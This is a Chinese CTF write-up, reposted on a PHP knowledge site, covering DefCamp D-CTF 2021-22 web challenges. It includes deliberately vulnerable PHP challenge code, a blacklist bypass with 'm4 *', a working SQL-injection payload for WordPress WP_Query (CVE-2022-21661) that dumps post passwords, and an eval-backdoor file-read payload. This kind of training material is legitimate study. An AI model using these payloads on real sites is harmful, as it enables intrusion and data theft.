IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> PHP知识库 -> DefCamp Capture the Flag (D-CTF) 2021-22 web -> 正文阅读

[PHP知识库]DefCamp Capture the Flag (D-CTF) 2021-22 web

前言

抽空看了下web

para-code

4长度rce需要有写权限,但是题目没有写权限,只能爆破一下后面的命令

<?php
require __DIR__ . '/flag.php';
if (!isset($_GET['start'])){
    show_source(__FILE__);
    exit;
} 

$blackList = array(
  'ss','sc','aa','od','pr','pw','pf','ps','pa','pd','pp','po','pc','pz','pq','pt','pu','pv','pw','px','ls','dd','nl','nk','df','wc', 'du'
);

$valid = true;
foreach($blackList as $blackItem)
{
    if(strpos($_GET['start'], $blackItem) !== false)
    {
         $valid = false;
         break;
    }
}

if(!$valid)
{
  show_source(__FILE__);
  exit;
}

// This will return output only for id and ps. 
if (strlen($_GET['start']) < 5){
  echo shell_exec($_GET['start']);
} else {
  echo "Please enter a valid command";
}

if (False) {
  echo $flag;
}
?>

最后爆破出为 ?start=m4 *

linux m4 命令

m4 将输入拷贝到输出,同时将宏展开. 宏可以是内嵌的也可以是用户定义的. 除了可以展开宏,m4还有一些内建的函数,用来引用文件,执行Unix命令,整数运算,文本操作,循环等. m4既可以作为编译器的前端也可以单独作为一个宏处理器。

research-it

一个wordpress站点,经过扫描 /wp-content/plugins/ 存在目录遍历


wp-content 下面的文件目录

  1. languages(语言包,中文什么的,可以安装其他语言包,也放这里)
  2. plugins(各种插件,比如301插件,回复插件,自动邮件插件什么的)
  3. themes(最新版本的wordpress默认有3个主题都是放这里,自己安装的主题也是放这里的)

wp-content下面一共就这3个目录

/wp-includes/wlwmanifest.xml 获得后台地址


尝试了一些基本的wordpress的漏洞均失败,突破点 hello.php存在备份文件能查看源码 hello.php~

发现了WP_Query ,前一段时间爆出一个sql注入 CVE-2022–21661

分析文章:某Press核心框架WP_Query SQL注入漏洞分析(CVE-2022–21661)


发现 add 的 action


有点不同的是,网上的poc是采用 json方式注入,这里改一下就完事了

payload:

action=Taxonomy&args[tax_query][0][field]=term_taxonomy_id&args[tax_query][0][terms][0]=1) and extractvalue(1,co
ncat(0x5e,(select substr((select group_concat(post_password) from wp_posts),10,40)),0x5e))#

casual-defence


一开始什么线索都没有,尝试apache的漏洞也没有成功,最后通过dirsearch 发现了一个疑点,访问 index.php时返回还是这个页面,说明后端为php,然后结合题目,网站被黑,怀疑存在后门函数,只不过需要自己fuzz参数,经过手动 fuzz,发现存在cmd参数命令执行,用Wfuzz也能出参数


Disable_function:

eval,passthru,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,shell_exec,get_defined_functions

发现执行了 ban了 eval,那么就是用了assert,php7环境下,无参读文件,取反也行

payload

?cmd=var_dump(file_get_contents(end(current(get_defined_vars()))));&y0ng=index.php

源码:

<?php
$note = "most of execution functions where blocked within the php.ini :D";
	
if (!isset($_GET['cmd'])){
	echo 'Hacked by NotRealH4ck3rN4m3! You shall not elevate me!';
} 
	
if(preg_match('/system|exec|passthru|shell|[\"\'\\\$\%\.\[\]\{\}\`\!\*\/]/', $_GET['cmd'])){
	echo "Try Harder!";
} else {
	eval($_GET['cmd']);
}
$flag = "CTF{40c7bf1cd2186ce4f14720c4243f1e276a8abe49004b788921828f13a026c5f1}";
?>

然后发现用的是 eval ,不是ban了吗,网上查到的原因:

在php.ini中,有个disable_functions项目,可以用于设置要禁用的php函数。但是却不能禁用eval函数。是因为eval并不是php的函数,而是zend的函数。

要想禁用eval函数需要使用 Suhosin php插件,php 禁用eval( )函数

it-support

Laravel v8.83.0 (PHP v7.3.33)

首页:


提交抓包:


测出xss,但是貌似没什么用


观察生成的ticket


这个是ticket的格式是这样的:TK-(year)(month)(day)(minutes)(second)-1xxx

当我刷新页面时只有时间和状态发生了变化,时间有大概两三秒的差别,状态从penting变为closed


然后就是一直爆破 ticket 的秒和后面的1xxx,我没爆出来

  PHP知识库 最新文章
Laravel 下实现 Google 2fa 验证
UUCTF WP
DASCTF10月 web
XAMPP任意命令执行提升权限漏洞(CVE-2020-
[GYCTF2020]Easyphp
iwebsec靶场 代码执行关卡通关笔记
多个线程同步执行,多个线程依次执行,多个
php 没事记录下常用方法 (TP5.1)
php之jwt
2021-09-18
上一篇文章      下一篇文章      查看所有文章
加:2022-02-16 12:50:43  更:2022-02-16 12:51:17 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 -2024/12/27 4:54:44-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码
数据统计